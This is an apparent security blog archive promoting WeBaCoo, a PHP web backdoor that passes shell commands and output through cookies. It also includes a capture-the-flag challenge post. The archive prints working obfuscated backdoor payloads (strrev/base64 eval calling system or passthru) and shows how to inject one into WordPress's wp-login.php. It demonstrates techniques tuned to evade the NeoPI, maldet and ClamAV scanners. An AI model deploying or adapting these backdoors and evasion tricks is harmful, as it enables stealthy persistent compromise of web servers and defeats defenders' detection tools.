Anestis Bechtsoudis » webacoo

Drunk Admin Web Hacking Challenge

anestisb — Mon, 02 Apr 2012 15:20:33 +0000

Recently I conducted a few keynote talks on the WeBaCoo tool and some web backdoor shell implementation techniques. As a great supporter of practical learning, I designed a relative web hacking challenge that was given to the events attendees after the end of the talk part. The challenge focuses on techniques and methodologies discussed during the talks and implements a slightly restricted web server setup serving a vulnerable image hosting service.

Download

The challenge was served on a Debian vmware image which is available for download on the following link:

Download Challenge (539MB) – md5sum:edf9bcd28049ed85312510d5872ea463
Download mirror from boot2root

Configuration

The network is configured to obtain an IP address via DHCP by default. Although if you want to further configure the virtual machine you can login as user root and password toor. The apache web server is configured to run on port 8880.

Mission

The challenge includes an image hosting web service that has various design vulnerabilities. You must enumerate the various web service features and find an exploitable vulnerability in order to read system hidden files. The web application is 100% custom so do not try to search google for relative PoC exploit code.

FINAL GOAL: Reveal the hidden message for a date arrange that Bob sent to Alice.

Work Flow

Enumerate carefully the web application
If you get stuck repeat 1
Try to spawn a web shell or find a way to execute server side code
Read the hidden message

Appendix

Congratulations to “Kyriakos Ispoglou (CEID student)” who was the first one that solved 100% the challenge.

Available solution work flows (thanks for sending them):

Kyriakos Ispoglou (english)
Euanthia Tsitsoka (greek)

Extra credits to mr.pr0n for providing a run2shell script exploiting the custom web application to spawn a remote shell with the vulnerable box.

If you find a different solving approach (with or without using WeBaCoo) or just solved the challenge and want to disclosure your solution contact me.

A. Bechtsoudis

WeBaCoo Tool: Keeping your web shell under the mainstream radars

anestisb — Wed, 21 Mar 2012 19:09:29 +0000

The past two weeks I conducted two presentations on the WeBaCoo tool. First one at 3rd unauthorized security meeting (11 March 2012) and the second at Patra’s Linux User Group meetup (20 March 2012).

Presentations did not focus solely on the WeBaCoo tool and its features. Critical topics around web shell implementation and communication techniques were discussed, focusing on how to maintain a stealth behavior. Both events were followed by a custom web hacking challenge for fun and learn.

I had a great time in both events and I would like to thank the organizing committees behind the scenes and people who attended the presentations. It’s pleasant to see that people started to get concern about security issues and actively participate in relevant events.

Presentations can be downloaded from the following links:

Unauthorized (.pdf 1.1MB)

PLUG (.pdf 1.1MB)

A. Bechtsoudis

Expanding WeBaCoo

anestisb — Sun, 29 Jan 2012 22:41:50 +0000

After two months from the initial release, WeBaCoo core communication functions are stable enough to provide a strong base for building some expansion modules. These modules are nothing more than regular actions that pentesters and sysadmins execute while interacting with the system, including database interactions, data file manipulation and more. The concept behind extension modules development, is to provide stealth, stable and highly customizable functionalities within the main terminal mode to assist users. All modules operate under the main WeBaCoo communication function and customize some settings in the target system if it is necessary for the module’s operations.

The extension modules were designed keeping in mind both simplicity and stealth behavior. An extension module that offers large scale functionalities but is capable to expose WeBaCoo by triggering IDS/IPS or application firewalls is not an option. Highly customization levels is an additional goal on the top of the module design hierarchy. The basic module parameters can be given by the user during the module load process within the interaction terminal. Although, experienced users that need to customize some extra parameters can dig into the module’s source code and edit the desired variables as needed. Besides, pentesters preserve a good rumor for their custom tweaking behavior when messing around with open source tools.

For detailed documentation about available extension modules, you can refer to the modules project wiki page.

During the rest of the post three extension modules will be analyzed: mysql-cli, psql-cli and upload.

MySQL-CLI

MySQL-CLI was the first module that was developed. It uses the mysql command line utility on the target server to execute mysql commands at the database service (local or remote). When the user loads the mysql-cli module the login credentials are stored in internal variables. During the mysql-cli interaction console, every user given command is packed as an oneliner and executed at the target server returning the relevant output from the database.

PSQL-CLI

PSQL-CLI is a module to interact with postgres databases. It uses the target system’s psql command line tool to communicate with postgres databases. The challenge while designing this module was to overcome the authentication interaction process that psql tool uses to login. Unlike mysql tool, psql doesn’t offer a password parameter to avoid the password authentication processes. To overcome this, a .pgpass file is created to the user’s home directory with the login credentials.

Upload

Messing around with the offered choices and after many tests, the final decision for the upload module was to use the HTTP POST method to upload files to the target host. A tiny php upload code is temporally placed at the target to serve the upload and then it is deleted. Every local file is uploaded as txt/plaintext to avoid any server side limitations or triggering any protection mechanism. Random strings names are generated to enhance the stealth behavior. When using the upload module it is strongly advised to encrypt or obfuscate the files before upload, to prevent any rule based detection for dangerous system/function names.

If you have any further ideas for additional modules contact me.

A. Bechtsoudis

Running WeBaCoo over HTTPS through proxy

anestisb — Tue, 20 Dec 2011 14:07:35 +0000

Recently I got a bunch of emails asking how to run WeBaCoo against HTTPS websites. Current 0.2 version does not support SSL/TLS protocols, although you can use the built-in proxy support combined with tools that offer proxy features (ZAP, Burp etc.) instead. WeBaCoo can use a web proxy with HTTPS support to establish the secure connection with the web server, and then send the request and get the relevant responses through it. The rest of the article will provide a relevant case study using ZAP‘s proxy support.

Initially ZAP is started and configured to run a localhost HTTP proxy on port 8080.

With the local proxy listening, WeBaCoo’s proxy support can be used to establish the secure connection with the remove web server.

root@testbed:~# ./webacoo.pl -t -u https://example.com/https_test.php -p 127.0.0.1:8080

And here are the requests & responses that ZAP captured:

A. Bechtsoudis

Maths behind web shell code detection

anestisb — Fri, 16 Dec 2011 16:36:20 +0000

Trying to enhance WeBaCoo’s stealth behavior I continuously examine various tools and methods used to detect hidden web backdoor shell code at infected hosts. The latest tool that came into my sight is NeoPI, a python script that uses various statistical methods to discover potential obfuscated and encrypted content within text/script files. NeoPI follows a very interesting approach by ranking potential malicious files based on Entropy, Longest Word and Index of Coincidence tests. Unfortunately, WeBaCoo’s base64 obfuscated backdoor code hasn’t passed undetected from NeoPI, ranked within the top 10 in a regular web server setup. Consequently, I proceeded to a further analysis of the tool in a try to find ways to effectively bypass its tests.

I mentioned NeoPI in one of my previous posts about web backdoor detection, although till recently I haven’t realized how useful it can prove under certain circumstances. The tool has five testing categories:

Entropy: Measure file’s uncertainty associated with the ascii charset (more info)
Longest Word: Large strings might form encrypted/obfuscated code
Index of Coincidence: Low IC indicates potential encryption/obfuscation (more info)
Signature: Search files for “dangerous” strings
Compression: Compare files’ compression ratio (more info)

To examine NeoPI’s results in a real setup, I established a web server debian VM with 3 CMS installations (Joomla, WordPress and Coppermine). Under the web root path I have placed two WeBaCoo’s generated files: webacoo.php (base64 obfuscated) and webacoo_raw.php (raw php code).

In order to make results more accurate, the file extension regular expression feature was used to search only for server side PHP files. The initial scan report for all the tests under the webroot path is as follow:

root@testbed:~# ./neopi.py -z -e -l -i -s /var/www/ \.php$

[[ Total files scanned: 10235 ]]
[[ Total files ignored: 0 ]]
[[ Scan Time: 48.170000 seconds ]]
 
[[ Top 10 entropic files for a given search ]]
  6.1817		/var/www/gallery/lang/chinese_gb.php
  6.1784		/var/www/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/langs/zh-cn.php
  6.1710		/var/www/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/langs/zh-tw.php
  5.8753		/var/www/blog/wp-admin/js/revisions-js.php
  5.7846		/var/www/gallery/lang/japanese.php
  5.7306		/var/www/webacoo.php
  5.6484		/var/www/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/langs/cs.php
  5.6296		/var/www/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/langs/sk.php
  5.6203		/var/www/plugins/system/nonumberelements/helper.php
  5.6133		/var/www/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/langs/pl.php
 
[[ Top 10 longest word files ]]
     745		/var/www/gallery/include/exif_php.inc.php
     745		/var/www/gallery/exifmgr.php
     741		/var/www/gallery/lang/japanese.php
     728		/var/www/blog/wp-admin/js/revisions-js.php
     522		/var/www/blog/wp-includes/functions.php
     516		/var/www/libraries/tcpdf/tcpdf.php
     474		/var/www/plugins/content/jw_allvideos/includes/sources.php
     456		/var/www/blog/wp-content/plugins/sexybookmarks/includes/html-helpers.php
     436		/var/www/gallery/lang/chinese_gb.php
     354		/var/www/blog/wp-includes/class-simplepie.php
 
[[ Average IC for Search ]]
0.0372679517799
 
[[ Top 10 lowest IC files ]]
  0.0198		/var/www/webacoo.php
  0.0206		/var/www/gallery/lang/chinese_gb.php
  0.0217		/var/www/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/langs/zh-tw.php
  0.0217		/var/www/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/langs/zh-cn.php
  0.0217		/var/www/templates/system/index.php
  0.0217		/var/www/administrator/templates/system/index.php
  0.0222		/var/www/blog/wp-content/themes/lightword/alternatives/404.php
  0.0226		/var/www/blog/wp-admin/js/revisions-js.php
  0.0270		/var/www/includes/HTML_toolbar.php
  0.0272		/var/www/templates/beez/html/com_user/reset/complete.php
 
[[ Top 10 signature match counts ]]
      43		/var/www/gallery/include/themes.inc.php
      43		/var/www/gallery/themes/sample/theme.php
      26		/var/www/blog/wp-admin/includes/class-ftp.php
      19		/var/www/blog/wp-content/plugins/nextgen-gallery/lib/imagemagick.inc.php
      14		/var/www/libraries/geshi/geshi/php.php
      13		/var/www/blog/wp-includes/Text/Diff/Engine/native.php
      10		/var/www/blog/wp-includes/js/tinymce/plugins/spellchecker/classes/PSpellShell.php
       9		/var/www/gallery/include/functions.inc.php
       8		/var/www/blog/wp-includes/js/tinymce/plugins/spellchecker/config.php
       8		/var/www/blog/wp-admin/includes/class-wp-filesystem-ssh2.php
 
[[ Top 10 compression match counts ]]
  1.0704		/var/www/administrator/templates/system/index.php
  1.0704		/var/www/templates/system/index.php
  1.0000		/var/www/blog/wp-content/plugins/sexybookmarks/includes/index.php
  1.0000		/var/www/blog/wp-content/plugins/sexybookmarks/js/index.php
  0.9663		/var/www/blog/wp-content/themes/lightword/alternatives/404.php
  0.8958		/var/www/includes/mambo.php
  0.8860		/var/www/includes/joomla.php
  0.8821		/var/www/includes/vcard.class.php
  0.8818		/var/www/includes/PEAR/PEAR.php
  0.8796		/var/www/includes/HTML_toolbar.php
 
[[ Top cumulative ranked files ]]
     122		/var/www/webacoo.php
     202		/var/www/blog/wp-admin/js/revisions-js.php
     528		/var/www/plugins/content/jw_allvideos/includes/elements/header.php
     912		/var/www/plugins/content/jw_allvideos/includes/helper.php
     984		/var/www/modules/mod_archive/helper.php
    1100		/var/www/libraries/bitfolge/vcard.php
    1210		/var/www/administrator/components/com_content/elements/article.php
    1240		/var/www/gallery/addfav.php
    1246		/var/www/administrator/components/com_installer/admin.installer.php
    1258		/var/www/administrator/components/com_config/views/component/view.php

While webacoo_raw.php successfully passed the tests, obfuscated code (webacoo.php) didn’t have the same luck. Entropy and Index of Coincidence tests have the highest scores, marking the tool as a possible malicous file. Despite these two scores, the obfuscated code has a high score at the longest word test too, but it is not observable in the lab setup because of the CMS long string matching and validating features.

These high scores are due to base64 encoding payload string. In order to bypass them, the generated code must implement some new features to trick these tests. My first thought was to split the encoded data into smaller chunks which are finally concatenated to form the overall payload. Although, after some tests this proved insufficient to bypass IC and Entropy tests. A second approach is to insert some spaces into the encoded data (space is not a valid base64 character) and delete them with a replace function before decode the data.

The question now is: After how many characters will a new space be inserted in order to have the best result? Trying to find the most efficient value, I created various code files with different group sizes (after 1,5,10,20 characters) between spaces and run NeoPI to compare the results.

root@testbed:~# ./neopi.py -z -e -l -i -s /var/www/pwn/ \.php$

[[ Total files scanned: 30 ]]
[[ Total files ignored: 0 ]]
[[ Scan Time: 0.010000 seconds ]]
 
[[ Top 10 entropic files for a given search ]]
  5.7646		/var/www/pwn/webacoo_new20.php
  5.7306		/var/www/pwn/webacoo.php
  5.6999		/var/www/pwn/webacoo_new10.php
  5.5322		/var/www/pwn/webacoo_new5.php
  5.1328		/var/www/pwn/webacoo_raw.php
  4.2037		/var/www/pwn/webacoo_new1.php
 
[[ Top 10 longest word files ]]
     295		/var/www/pwn/webacoo.php
      94		/var/www/pwn/webacoo_raw.php
      51		/var/www/pwn/webacoo_new1.php
      51		/var/www/pwn/webacoo_new10.php
      51		/var/www/pwn/webacoo_new5.php
      51		/var/www/pwn/webacoo_new20.php
 
[[ Average IC for Search ]]
0.040872937004
 
[[ Top 10 lowest IC files ]]
  0.0194		/var/www/pwn/webacoo_new20.php
  0.0198		/var/www/pwn/webacoo.php
  0.0224		/var/www/pwn/webacoo_new10.php
  0.0301		/var/www/pwn/webacoo_raw.php
  0.0338		/var/www/pwn/webacoo_new5.php
  0.2009		/var/www/pwn/webacoo_new1.php
 
[[ Top 10 signature match counts ]]
       1		/var/www/pwn/webacoo.php
       1		/var/www/pwn/webacoo_raw.php
       1		/var/www/pwn/webacoo_new1.php
       1		/var/www/pwn/webacoo_new10.php
       1		/var/www/pwn/webacoo_new5.php
       1		/var/www/pwn/webacoo_new20.php
 
[[ Top 10 compression match counts ]]
  0.8114		/var/www/pwn/webacoo_new10.php
  0.8101		/var/www/pwn/webacoo_new20.php
  0.7993		/var/www/pwn/webacoo.php
  0.7947		/var/www/pwn/webacoo_new5.php
  0.7593		/var/www/pwn/webacoo_raw.php
  0.5407		/var/www/pwn/webacoo_new1.php
 
[[ Top cumulative ranked files ]]
       8		/var/www/pwn/webacoo_new20.php
       9		/var/www/pwn/webacoo.php
      11		/var/www/pwn/webacoo_new10.php
      17		/var/www/pwn/webacoo_new5.php
      17		/var/www/pwn/webacoo_raw.php
      22		/var/www/pwn/webacoo_new1.php

webacoo_new20.php (insert space after 20 characters) has the worst behavior (even worse than the original webacoo.php with no spaces inserted). On the other hand webacoo_new1.php (space after each character) has the lowest score in every partial test, making it the most efficient choice (even better from the raw code).

Consequently, the new final backdoor file that is capable to pass undetected from NeoPI is as follow:

 $b=strrev("edoced_4"."6esab");eval($b(str_replace(" ","","a W Y o a X N z Z X Q o J F 9 D T 0 9 L S U V b J 2 N t J 1 0 p K X t v Y l 9 z d G F y d C g p O 3 N 5 c 3 R l b S h i Y X N l N j R f Z G V j b 2 R l K C R f Q 0 9 P S 0 l F W y d j b S d d K S 4 n I D I + J j E n K T t z Z X R j b 2 9 r a W U o J F 9 D T 0 9 L S U V b J 2 N u J 1 0 s J F 9 D T 0 9 L S U V b J 2 N w J 1 0 u Y m F z Z T Y 0 X 2 V u Y 2 9 k Z S h v Y l 9 n Z X R f Y 2 9 u d G V u d H M o K S k u J F 9 D T 0 9 L S U V b J 2 N w J 1 0 p O 2 9 i X 2 V u Z F 9 j b G V h b i g p O 3 0 = "))); ?>

root@testbed:~# ./neopi.py -z -e -l -i -s /var/www/ \.php$

[[ Total files scanned: 10230 ]]
[[ Total files ignored: 0 ]]
[[ Scan Time: 46.120000 seconds ]]
 
[[ Top 10 entropic files for a given search ]]
  6.1817		/var/www/gallery/lang/chinese_gb.php
  6.1784		/var/www/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/langs/zh-cn.php
  6.1710		/var/www/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/langs/zh-tw.php
  5.8753		/var/www/blog/wp-admin/js/revisions-js.php
  5.7846		/var/www/gallery/lang/japanese.php
  5.6484		/var/www/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/langs/cs.php
  5.6296		/var/www/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/langs/sk.php
  5.6203		/var/www/plugins/system/nonumberelements/helper.php
  5.6133		/var/www/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/langs/pl.php
  5.6060		/var/www/blog/wp-config.php
 
[[ Top 10 longest word files ]]
     745		/var/www/gallery/include/exif_php.inc.php
     745		/var/www/gallery/exifmgr.php
     741		/var/www/gallery/lang/japanese.php
     728		/var/www/blog/wp-admin/js/revisions-js.php
     522		/var/www/blog/wp-includes/functions.php
     516		/var/www/libraries/tcpdf/tcpdf.php
     474		/var/www/plugins/content/jw_allvideos/includes/sources.php
     456		/var/www/blog/wp-content/plugins/sexybookmarks/includes/html-helpers.php
     436		/var/www/gallery/lang/chinese_gb.php
     354		/var/www/blog/wp-includes/class-simplepie.php
 
[[ Average IC for Search ]]
0.0372700176166
 
[[ Top 10 lowest IC files ]]
  0.0206		/var/www/gallery/lang/chinese_gb.php
  0.0217		/var/www/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/langs/zh-tw.php
  0.0217		/var/www/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/langs/zh-cn.php
  0.0217		/var/www/templates/system/index.php
  0.0217		/var/www/administrator/templates/system/index.php
  0.0222		/var/www/blog/wp-content/themes/lightword/alternatives/404.php
  0.0226		/var/www/blog/wp-admin/js/revisions-js.php
  0.0270		/var/www/includes/HTML_toolbar.php
  0.0272		/var/www/templates/beez/html/com_user/reset/complete.php
  0.0273		/var/www/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/langs/cs.php
 
[[ Top 10 signature match counts ]]
      43		/var/www/gallery/include/themes.inc.php
      43		/var/www/gallery/themes/sample/theme.php
      26		/var/www/blog/wp-admin/includes/class-ftp.php
      19		/var/www/blog/wp-content/plugins/nextgen-gallery/lib/imagemagick.inc.php
      14		/var/www/libraries/geshi/geshi/php.php
      13		/var/www/blog/wp-includes/Text/Diff/Engine/native.php
      10		/var/www/blog/wp-includes/js/tinymce/plugins/spellchecker/classes/PSpellShell.php
       9		/var/www/gallery/include/functions.inc.php
       8		/var/www/blog/wp-includes/js/tinymce/plugins/spellchecker/config.php
       8		/var/www/blog/wp-admin/includes/class-wp-filesystem-ssh2.php
 
[[ Top 10 compression match counts ]]
  1.0704		/var/www/administrator/templates/system/index.php
  1.0704		/var/www/templates/system/index.php
  1.0000		/var/www/blog/wp-content/plugins/sexybookmarks/includes/index.php
  1.0000		/var/www/blog/wp-content/plugins/sexybookmarks/js/index.php
  0.9663		/var/www/blog/wp-content/themes/lightword/alternatives/404.php
  0.8958		/var/www/includes/mambo.php
  0.8860		/var/www/includes/joomla.php
  0.8821		/var/www/includes/vcard.class.php
  0.8818		/var/www/includes/PEAR/PEAR.php
  0.8796		/var/www/includes/HTML_toolbar.php
 
[[ Top cumulative ranked files ]]
     199		/var/www/blog/wp-admin/js/revisions-js.php
     521		/var/www/plugins/content/jw_allvideos/includes/elements/header.php
     907		/var/www/plugins/content/jw_allvideos/includes/helper.php
     977		/var/www/modules/mod_archive/helper.php
    1094		/var/www/libraries/bitfolge/vcard.php
    1203		/var/www/administrator/components/com_content/elements/article.php
    1233		/var/www/gallery/addfav.php
    1240		/var/www/administrator/components/com_installer/admin.installer.php
    1252		/var/www/administrator/components/com_config/views/component/view.php
    1264		/var/www/xmlrpc/includes/framework.php

This new technique to bypass statistical detection methods will be implemented in WeBaCoo’s next release.

A. Bechtsoudis

Bypass base64 decoder detection

anestisb — Sun, 11 Dec 2011 19:36:41 +0000

Almost two weeks after WeBaCoo’s release, I started to organize the results from various tests under different protection/detection tools for a comprehensive writeup. Something that draw my attention is how easily some malware scanning tools mark as “threat” WeBaCoo’s generated backdoor code. A simple use of the base64 decoder function is enough to trigger scanner’s content matching rulesets no matter what the processing data are. Additionally to this strict approach, I came forward recently in the Internet with some official web backdoor detection tutorials including content matching checks for the decoder function. These two things led me to a small research for finding tricks to bypass such content matching mechanisms.

A list of tools and scripts that marked as “threat” WeBaCoo’s generated code based on the base64 decoder use, is as following (check the first image gallery at the end of the post for report screenshots):

Linux Malware Detect (website)
PHP Shell Scanner (website)
Virus Total (only ESET mark it as threat)
Look for bad guys script (website)

After inspecting how the above tools work, I thought two main methods that can be used to trick the base64 encoder content matching rules: string reversing and string splitting. These two methods can be combined to create more tricky code, always taking into account the least possible character use. WeBaCoo generates PHP backdoor code, so I will work these methods under PHP. Although the same concept can be applied to other languages too.

String Reversing

Lucky for us PHP provides the strrev() function in order to easily reverse a string. Knowing that base64_decoder was the function name that triggered the above tools, strrev can be used to trick them. Let’s form an example to see that our concept works before proceeding to backdoor alterations.


//base64 encode of "show me your code"
$data="c2hvdyBtZSB5b3VyIGNvZGU=";
 
//$bd="base64_decode"
$bd=strrev("edoced_46esab");
 
//print decoded data
//eval is used to evaluate string as PHP code
eval("echo \$bd(\$data);");
?>

root@testbed:~# php reverse.php
show me your code

root@testbed:~# maldet -a /var/www/pwn/reverse.php

Linux Malware Detect v1.4.1

            (C) 2002-2011, R-fx Networks

            (C) 2011, Ryan MacDonald 

inotifywait (C) 2007, Rohan McGovern 

This program may be freely redistributed under the terms of the GNU GPL v2
maldet(4332): {scan} signatures loaded: 8668 (6804 MD5 / 1864 HEX)

maldet(4332): {scan} building file list for /var/www/pwn/reverse.php, this might take awhile...

maldet(4332): {scan} file list completed, found 1 files...

maldet(4332): {scan} found ClamAV clamscan binary, using as scanner engine...

maldet(4332): {scan} scan of /var/www/pwn/reverse.php (1 files) in progress...

maldet(4332): {scan} scan completed on /var/www/pwn/reverse.php: files 1, malware hits 0, cleaned hits 0 maldet(4332): {scan} scan report saved, to view run: maldet --report 121111-2034.4332

String Splitting

The concept behind this technique is to split the trigger string (“base64_decode”) into smaller chunks, that can be later concatenated to form the function name.


//base64 encode of "show me your code"
$data="c2hvdyBtZSB5b3VyIGNvZGU=";
 
//split into two chunks
$ac="base6";
$bc="4_decode";
 
//concat the chunks
$cc=$ac.$bc;
 
//print decoded data
//eval is used to evaluate string as PHP code
eval("echo \$cc(\$data);");
?>

root@testbed:~# php split.php
show me your code

root@testbed:~# maldet -a /var/www/pwn/split.php

Linux Malware Detect v1.4.1

            (C) 2002-2011, R-fx Networks

            (C) 2011, Ryan MacDonald 

inotifywait (C) 2007, Rohan McGovern 

This program may be freely redistributed under the terms of the GNU GPL v2
maldet(4509): {scan} signatures loaded: 8668 (6804 MD5 / 1864 HEX)

maldet(4509): {scan} building file list for /var/www/pwn/split.php, this might take awhile...

maldet(4509): {scan} file list completed, found 1 files...

maldet(4509): {scan} found ClamAV clamscan binary, using as scanner engine...

maldet(4509): {scan} scan of /var/www/pwn/split.php (1 files) in progress...

maldet(4509): {scan} scan completed on /var/www/pwn/split.php: files 1, malware hits 0, cleaned hits 0 maldet(4509): {scan} scan report saved, to view run: maldet --report 121111-2049.4509

Knowing that the above two techniques work against decoder’s string name detection, they can be combined to form the desired functionality. The following PHP code is a short example of such a combination that is used in the new backdoor code. I will conduct the same tests to see if the new backdoor code successfully passes all of them. You can see the results in the second image gallery at the end of the post.

 $c=strrev("edoced_4"."6esab");eval($c("aWYoaXNzZXQoJF9DT09LSUVbJ2NtJ10pKXtvYl9zdGFydCgpO3N5c3RlbShiYXNlNjRfZGVjb2RlKCRfQ09PS0lFWydjbSddKS4nIDI+JjEnKTtzZXRjb29raWUoJF9DT09LSUVbJ2NuJ10sJF9DT09LSUVbJ2NwJ10uYmFzZTY0X2VuY29kZShvYl9nZXRfY29udGVudHMoKSkuJF9DT09LSUVbJ2NwJ10pO29iX2VuZF9jbGVhbigpO30=")); ?>

These two techniques will be implemented in WeBaCoo’s next release after I conclude to the more efficient ways of use.

Initial Code Report Results

New Code Report Results

DISCLAIMER: I’m not responsible with what you do with this info. This information is for educational purposes only.

A. Bechtsoudis

WeBaCoo (Web Backdoor Cookie) Script-Kit – The Birth

anestisb — Tue, 29 Nov 2011 14:48:47 +0000

Recently I was messing around with some PHP backdoors capable to provide a “pseudo”-terminal connection with a remote web server injected with a chunk of malicious PHP code. All the existing script and tools (such as weevely, hookworm) send the shell commands hidden in HTTP header fields, although the server’s output is printed out as part of the HTML code. Inspired from the above implementations, I thought why not sending the server’s command output using the HTTP response headers. And under these dark thoughts WeBaCoo (Web Backdoor Cookie) script-kit has been released.

The general concept is pretty simple. Initially the backdoor PHP code is generated using payloads containing main PHP system functions that operate under a basic Cookie handling mechanism. After the code injection the client can send shell commands hidden in Cookie headers obfuscated with base64 encoding. On the server side the shell command is executed and the output is transmitted back to client hidden (base64 encoded too) in Cookie headers.

WeBaCoo is written in perl and is available at github. Clone the repository:

git clone git://github.com/anestisb/WeBaCoo.git

Or download the latest version from:

http://bechtsoudis.com/data/tools/webacoo-latest.tar.gz

Let’s see two case studies in order to present WeBaCoo‘s functionalities. I will use a local burp proxy (127.0.0.1:8080) to inspect the HTTP header cookies.

1. Simple case

The first scenario involves the addition of a new PHP file with the obfuscated backdoor code in the webroot path. After the addition the client can use the termninal mode to execute commands to the server.

Initially let’s create the backdoor file using the ‘shell_exec’ system function:

root@testbed:~# ./webacoo.pl -g -f 2 -o backdoor.php



 WeBaCoo 0.1 - Web Backdoor Cookie Script-Kit

 Written by Anestis Bechtsoudis { @anestisb | anestis@bechtsoudis.com }

 http(s)://bechtsoudis.com

[+] Backdoor file "backdoor.php" created.

Then I upload the backdoor.php in the victim server and start a “terminal” connection:

root@testbed:~# ./webacoo.pl -t -u http://172.16.146.128/backdoor.php



 WeBaCoo 0.1 - Web Backdoor Cookie Script-Kit

 Written by Anestis Bechtsoudis { @anestisb | anestis@bechtsoudis.com }

 http(s)://bechtsoudis.com
Type 'exit' to quit terminal!
webacoo> whoami

www-data

webacoo> exit

^Bye^

And the relative request and response recorded from burp are seen in the following screen-shots:

2. Complex case – backdooring wordpress login

WordPress familiar users know that before the login process, the server creates a Test-cookie to examine if broswer has cookies enabled. After that test cookie set I will inject the backdoor code unobfuscated. I create the PHP payload using the ‘passthru’ function and the -r (raw output) flag to get the un-obfuscated code.

root@testbed:~# ./webacoo.pl -g -f 4 -o raw-backdoor.php -r



 WeBaCoo 0.1 - Web Backdoor Cookie Script-Kit

 Written by Anestis Bechtsoudis { @anestisb | anestis@bechtsoudis.com }

 http(s)://bechtsoudis.com

[+] Backdoor file "raw-backdoor.php" created.

Then the malicious code is injected under the Test-Cookie set. So the wp-login.php is as follow (only the crucial lines are included):

//Set a cookie now to see if they are supported by the browser.
setcookie(TEST_COOKIE, 'WP Cookie check', 0, COOKIEPATH, COOKIE_DOMAIN);
if ( SITECOOKIEPATH != COOKIEPATH )
        setcookie(TEST_COOKIE, 'WP Cookie check', 0, SITECOOKIEPATH, COOKIE_DOMAIN);
 
//My payload
if(isset($_COOKIE['cm'])){ob_start();passthru(base64_decode($_COOKIE['cm']).' 2>&1');setcookie($_COOKIE['cn'],$_COOKIE['cp'].base64_encode(ob_get_contents()).$_COOKIE['cp'], 0, SITECOOKIEPATH, COOKIE_DOMAIN);ob_end_clean();}
 
// allow plugins to override the default actions, and to add extra actions if they want
do_action( 'login_init' );
do_action( 'login_form_' . $action );

After the injection I establish a “terminal” connection to the infected server to execute my commands:

root@testbed:~# ./webacoo.pl -t -u http://172.16.146.128/wordpress/wp-login.php -p 127.0.0.1:8080



 WeBaCoo 0.1 - Web Backdoor Cookie Script-Kit

 Written by Anestis Bechtsoudis { @anestisb | anestis@bechtsoudis.com }

 http(s)://bechtsoudis.com
Type 'exit' to quit terminal!
webacoo> whoami

www-data

webacoo> exit

^Bye^

And the relative request and response recorded from burp:

As you can see the communication data are pretty stealth and will not trigger regular application firewalls and IDS/IPS setups. Although, I will appreciate your feedeback from various tests under your setups to evaluate and evolve WeBaCoo functionalities.

A. Bechtsoudis